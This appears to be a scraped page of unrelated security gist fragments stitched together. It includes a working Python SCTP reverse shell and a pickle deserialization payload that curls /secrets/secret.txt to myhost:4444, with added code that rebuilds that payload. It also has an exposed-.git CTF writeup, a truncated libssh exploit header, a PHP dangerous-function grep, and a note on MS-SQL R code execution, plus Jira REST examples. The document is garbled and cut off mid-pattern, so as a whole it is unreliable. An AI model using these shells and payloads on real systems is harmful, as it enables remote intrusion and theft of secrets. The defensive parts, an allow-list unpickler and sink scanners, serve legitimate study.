This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8
#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`
import os, socket, subprocess
RHOST = '127.0.0.1'
RPORT = 1234
# SCTP uses the same stream-socket API as TCP; only the protocol number differs,
# which is also why TCP-only egress filters may let it through.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_SCTP)
s.connect((RHOST, RPORT))
# Point stdin/stdout/stderr at the socket, then hand them to an interactive shell.
for fd in (0, 1, 2):
    os.dup2(s.fileno(), fd)
subprocess.call(['/bin/sh', '-i'])
-- challenge 1:
From the name of the challenge it was a dead giveaway that there was a .git folder exposed.
Then just find out where the git repo is hosted:
curl http://0x70.apl3b.com/.git/config
And get the repo hosting service:
https://gitlab.com/DDuarte/twipy.git
Finally check all the commits and on this one at the bottom of the page you can read a flag:
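The step above (pull `/.git/config`, read the `[remote]` URL, then go look at the hosted history) is mechanical enough to script. The following is an added example, not part of the writeup: it parses a constructed `.git/config` with a small hand-written parser (git's format is INI-like but tab-indents keys and quotes subsection names), lists the paths whose presence indicates a dumped `.git` directory, and wraps the live fetch. The hostname and repository path in the sample are invented.

```python
import re
import urllib.parse
import urllib.request

# Constructed sample of what an exposed /.git/config typically returns
# (the remote URLs are invented for this example).
SAMPLE_GIT_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
[remote "origin"]
\turl = https://gitlab.com/example/project.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "backup"]
\turl = git@github.com:example/project-mirror.git
[branch "master"]
\tremote = origin
\tmerge = refs/heads/master
"""

_SECTION = re.compile(r'^\s*\[(\w+)(?:\s+"([^"]*)")?\]\s*$')
_KEYVAL = re.compile(r'^\s*([\w-]+)\s*=\s*(.*?)\s*$')


def parse_git_remotes(config_text):
    """Return {remote_name: url} from the text of a .git/config file."""
    remotes = {}
    current = None  # (section, subsection) currently being read
    for line in config_text.splitlines():
        m = _SECTION.match(line)
        if m:
            current = (m.group(1), m.group(2))
            continue
        kv = _KEYVAL.match(line)
        if kv and current and current[0] == 'remote' and kv.group(1) == 'url':
            remotes[current[1]] = kv.group(2)
    return remotes


def git_exposure_urls(base_url):
    """URLs whose presence indicates a reachable .git directory on a web root."""
    root = base_url.rstrip('/') + '/'
    return [urllib.parse.urljoin(root, p)
            for p in ('.git/HEAD', '.git/config', '.git/index', '.git/logs/HEAD')]


def fetch_remotes(base_url, timeout=5):
    """Fetch /.git/config from a live target and extract its remotes (network I/O)."""
    url = urllib.parse.urljoin(base_url.rstrip('/') + '/', '.git/config')
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return parse_git_remotes(resp.read().decode('utf-8', 'replace'))


if __name__ == '__main__':
    print(parse_git_remotes(SAMPLE_GIT_CONFIG))
```

`.git/HEAD` is the cheapest existence check (it is a one-line file); `.git/config` is the one that names the upstream, and `.git/index` plus `.git/logs/HEAD` are what a full dumper needs to reconstruct history offline if directory listing is disabled.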
cposix
system
p0
(S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444'
p1
tp2
Rp3
.
FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!}
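The bytes above are a protocol-0 pickle: `c` (GLOBAL) imports `posix.system`, `S` pushes the command string, `t` wraps it in a tuple and `R` (REDUCE) calls the function with it, all before any object is even returned. The following is an added example, not the challenge code: it reproduces that payload from a `__reduce__` method (Python 3 emits `V` instead of `S` for the string, but the GLOBAL/REDUCE shape is identical), statically lists the globals a blob would import without executing it, and shows the allow-list `Unpickler.find_class` override that refuses them. The command string is the one from the payload; nothing in the block runs it.

```python
import io
import os
import pickle
import pickletools

# Same command as the challenge payload above; it is never executed here.
COMMAND = 'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444'


class Payload:
    """Whatever __reduce__ returns as (callable, args) is invoked by REDUCE."""
    def __reduce__(self):
        return (os.system, (COMMAND,))


def build_payload(protocol=0):
    """Serialise Payload; protocol 0 yields the readable form shown above."""
    return pickle.dumps(Payload(), protocol=protocol)


def list_globals(data):
    """Statically list (module, name) pairs a pickle would import, without loading it.

    GLOBAL (protocols 0-3) carries its target inline.  STACK_GLOBAL (protocol 4+)
    takes module and name from the two most recent string pushes, which this
    scanner tracks; it does not follow memo references, so an unresolved
    STACK_GLOBAL is reported as ('?', '?') rather than silently dropped.
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == 'GLOBAL':
            module, name = arg.split(' ', 1)
            found.append((module, name))
        elif op.name == 'STACK_GLOBAL':
            found.append(tuple(strings[-2:]) if len(strings) >= 2 else ('?', '?'))
        elif op.name in ('SHORT_BINUNICODE', 'BINUNICODE', 'BINUNICODE8', 'UNICODE'):
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Only the globals on the allow-list may be resolved; everything else is refused."""
    ALLOWED = {('builtins', 'set'), ('builtins', 'frozenset'),
               ('collections', 'OrderedDict')}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f'forbidden global {module}.{name}')


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejects(data):
    """True if the restricted unpickler refuses the blob."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def benign_blob():
    """A pickle of plain containers; it needs no GLOBAL at all."""
    return pickle.dumps({'a': [1, 2], 'b': 'x'})


if __name__ == '__main__':
    blob = build_payload()
    print(blob)
    print('imports:', list_globals(blob))
    print('rejected:', rejects(blob))
```

The allow-list is the important part: the scanner is a triage aid, not a gate, because an attacker who can pick the callable will pick one that is itself "harmless" to import but dangerous to call with attacker-chosen arguments. Only loading data you trust, or a format with no code-execution semantics (JSON, msgpack), removes the problem the flag text refers to.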
# -u uname:pass puts the password in shell history and `ps` output; prefer `-u uname` (curl prompts) or a ~/.netrc entry
#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/
#Returns all information for all versions (a GET; the header goes in -H, not in a PUT body)
curl -D- -u uname:pass -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions
#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
#-G with --data-urlencode sends the JQL as a URL-encoded query string, so the quotes and spaces survive
curl -D- -u uname:pass -H "Content-Type: application/json" -G --data-urlencode "jql=project=\"AN\" AND fixVersion='12345'" http://localhost:8080/jira/rest/api/2/search
#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/
#Returns all information on an issue (a GET; the header goes in -H, not in a PUT body)
curl -D- -u uname:pass -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345
#Adds a comment to an existing issue (PUT on the issue with an "update" block)
curl -D- -u uname:pass -X PUT -d "{\"update\": {\"comment\": [{\"add\": {\"body\": \"Comment added when resolving issue\"}}]}}" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345
#Transitions an issue
JIRA_REST_URL="${JIRA_REST_URL:-https://MYCOMPANY.jira.com/rest/api/2}"
JIRA_CREDENTIALS="${JIRA_CREDENTIALS:-user:password}"
# https://developer.atlassian.com/jiradev/api-reference/jira-rest-apis/jira-rest-api-tutorials/jira-rest-api-example-discovering-meta-data-for-creating-issues
# https://MYCOMPANY.jira.com/rest/api/2/issue/createmeta?projectKeys=MYPROJ&issuetypeNames=MyIssueType&expand=projects.issuetypes.fields
# customfield_10171: My Custom Field Name 1
# customfield_10172: My Custom Field Name 2
# This function creates a new issue of type 'MyIssueType' in project 'MYPROJ' with 2 custom fields
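The curl one-liners above hard-code `customfield_…` IDs and an `issuetype` ID that differ per Jira instance; the `createmeta` call referenced in this snippet is what tells you which ID and which value shape (`{"id": …}` for option fields, a bare string for text fields) each field expects. The following is an added example, not the gist's or Atlassian's own code: it maps field names to IDs from a constructed `createmeta` excerpt (the project key, issue type, field IDs and option IDs are invented), builds the create-issue body from that mapping, and assembles the request with Basic auth read from the environment rather than from a `user:password` string on the command line.

```python
import base64
import json
import os
import urllib.request

# Constructed excerpt of GET /rest/api/2/issue/createmeta?...&expand=projects.issuetypes.fields
# for this example; the IDs are invented.
SAMPLE_CREATEMETA = {
    "projects": [{
        "key": "MYPROJ", "id": "10430",
        "issuetypes": [{
            "name": "MyIssueType", "id": "10001",
            "fields": {
                "summary": {"required": True, "name": "Summary",
                            "schema": {"type": "string"}},
                "customfield_10171": {"required": False, "name": "My Custom Field Name 1",
                                      "schema": {"type": "string"}},
                "customfield_10172": {"required": True, "name": "My Custom Field Name 2",
                                      "schema": {"type": "option"},
                                      "allowedValues": [{"id": "10500", "value": "Yes"},
                                                        {"id": "10501", "value": "No"}]},
            },
        }],
    }],
}


def field_map(createmeta, project_key, issuetype_name):
    """Map display name -> (field id, schema type, {option value: option id})."""
    for project in createmeta["projects"]:
        if project["key"] != project_key:
            continue
        for itype in project["issuetypes"]:
            if itype["name"] != issuetype_name:
                continue
            return {
                f["name"]: (fid, f["schema"]["type"],
                            {v["value"]: v["id"] for v in f.get("allowedValues", [])})
                for fid, f in itype["fields"].items()
            }
    raise KeyError(f"{project_key}/{issuetype_name} not present in createmeta")


def build_issue(fields, project_id, issuetype_id, summary, custom):
    """Body for POST /rest/api/2/issue; option fields are sent as {"id": ...}."""
    body = {"fields": {"project": {"id": project_id},
                       "issuetype": {"id": issuetype_id},
                       "summary": summary}}
    for name, value in custom.items():
        fid, ftype, options = fields[name]
        body["fields"][fid] = {"id": options[value]} if ftype == "option" else value
    return body


def make_request(base_url, body, user=None, token=None):
    """urllib Request with Basic auth; credentials come from JIRA_USER/JIRA_TOKEN
    in the environment unless passed explicitly, so they never appear in argv."""
    user = user or os.environ["JIRA_USER"]
    token = token or os.environ["JIRA_TOKEN"]
    cred = base64.b64encode(f"{user}:{token}".encode()).decode()
    return urllib.request.Request(
        base_url.rstrip("/") + "/issue",
        data=json.dumps(body).encode(),
        method="POST",
        headers={"Content-Type": "application/json",
                 "Authorization": "Basic " + cred})


if __name__ == "__main__":
    fm = field_map(SAMPLE_CREATEMETA, "MYPROJ", "MyIssueType")
    body = build_issue(fm, "10430", "10001", "This is a test issue",
                       {"My Custom Field Name 1": "hello", "My Custom Field Name 2": "Yes"})
    print(json.dumps(body, indent=2))
    # urllib.request.urlopen(make_request(os.environ["JIRA_REST_URL"], body)) would send it
```

Asking `createmeta` for `allowedValues` also gives you an early, local validation step: a typo in an option value fails in `build_issue` instead of as an opaque 400 from the server.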
#!/bin/bash
# Grep PHP sources for functions that execute commands, touch the process, or open sockets.
# Target path defaults to everything in the current directory.
P="*"
if [ -n "$1" ]; then
P="$1"
fi
# Note: each name is anchored on a preceding whitespace (\s), so calls written as @exec(, =exec( or (exec( are not matched.
grep -E "\spassthru\(|\sexec\(|\spcntl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s
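The `\s` prefix in the grep pattern above is there to avoid matching `my_exec(`, but it also misses the common spellings `@system(`, `$r=exec(` and `echo(passthru(`, and grep is case-sensitive while PHP function names are not. The following is an added example, not the gist's script: the same idea with a negative lookbehind instead of `\s`, case-insensitive matching, and a report of line numbers, run over a constructed PHP snippet that contains exactly those edge cases. The sink list is a subset of the one in the grep pattern, chosen for the example.

```python
import pathlib
import re

# Constructed PHP sample for this example; lines 3-5 are the cases the
# whitespace-anchored grep above does not match, line 6 is a case variant,
# line 7 must not be flagged, and line 8 is a dynamic call no regex will see.
SAMPLE_PHP = r"""<?php
$out = shell_exec('ls -la');
@system($_GET['cmd']);
$r=exec($cmd, $lines);
echo(passthru("id"));
SYSTEM('whoami');
my_exec('not a sink');
$fn = 'system'; $fn($cmd);
// eval('phpinfo();') in a comment
"""

SINKS = [
    'passthru', 'exec', 'pcntl_exec', 'proc_open', 'popen', 'system',
    'shell_exec', 'eval', 'expect_popen', 'register_shutdown_function',
    'register_tick_function', 'putenv', 'fsockopen', 'pfsockopen',
]

# (?<![\w$]) : the name is not the tail of a longer identifier or a $variable
# re.I       : PHP function names are case-insensitive
SINK_RE = re.compile(r'(?<![\w$])(' + '|'.join(map(re.escape, SINKS)) + r')\s*\(', re.I)


def find_sinks(source, sinks_re=SINK_RE):
    """Return (line_number, sink_name, line_text) for each call to a listed sink."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith(('//', '#', '*')):  # skip obvious comment lines
            continue
        for m in sinks_re.finditer(line):
            hits.append((lineno, m.group(1).lower(), line.strip()))
    return hits


def scan_tree(root):
    """Walk *.php files under root and collect hits per file (disk I/O)."""
    results = {}
    for f in pathlib.Path(root).rglob('*.php'):
        hits = find_sinks(f.read_text(errors='replace'))
        if hits:
            results[str(f)] = hits
    return results


if __name__ == '__main__':
    for lineno, name, text in find_sinks(SAMPLE_PHP):
        print(f'{lineno}: {name:<12} {text}')
```

Line 8 of the sample (`$fn($cmd)` after `$fn = 'system'`) is the reminder that any grep-style scan, this one included, only finds literal call sites; variable functions, `call_user_func`, and `create_function`-style indirection need a real PHP parser or a taint tool to catch.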
# original https://pastebin.com/zBDnzELT
Starting with MS-SQL 2016, Microsoft has allowed the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. For this functionality to be enabled, the R Services component for SQL Server must be installed, the server must be reconfigured to permit sp_execute_external_script (sp_configure 'external scripts enabled', 1), and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly common.
Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script(). R code runs as a separate OS process outside the SQL engine, so a user with this permission effectively gets code execution on the database host, not just query access.
This can be 'fun'..
Sample R query in MS-SQL (from MSDN):